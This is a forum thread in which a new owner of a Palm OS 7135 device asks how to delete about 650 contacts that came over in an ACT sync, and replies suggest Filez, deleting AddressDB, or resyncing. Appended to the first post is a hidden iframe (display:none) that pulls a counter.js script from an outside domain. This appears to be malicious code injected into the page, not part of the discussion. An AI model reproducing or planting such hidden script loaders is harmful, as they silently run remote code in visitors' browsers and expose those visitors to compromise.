+ Reply to Thread

Help; simple question?

I'm brand new to the world of PDAs (I've been holding out for a good convergence device like my 7135), so this may be a simple question, but I need to know a simple, efficient way to delete about 650 contacts in my 7135. I successfully synced it w/ACT, but, since I'm new to this, it brought over more than I needed. Can anyone please help me w/this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is really a Palm OS question and not specific to the 7135. You can delete all contacts with a program like Filez

Just delete the entire AddressDB. If you need to select a group, can't you delete (marked selectively) from ACT and resync? I don't use ACT but you have this capability from other desktop PIMs.

All the contacts I want to delete are in the "unfiled" category, and I can't delete/rename that one from the application. Again, I'm brand new to these things, so I am just looking for a simple solution to this issue, and thought that people in this forum would know if it's even possible.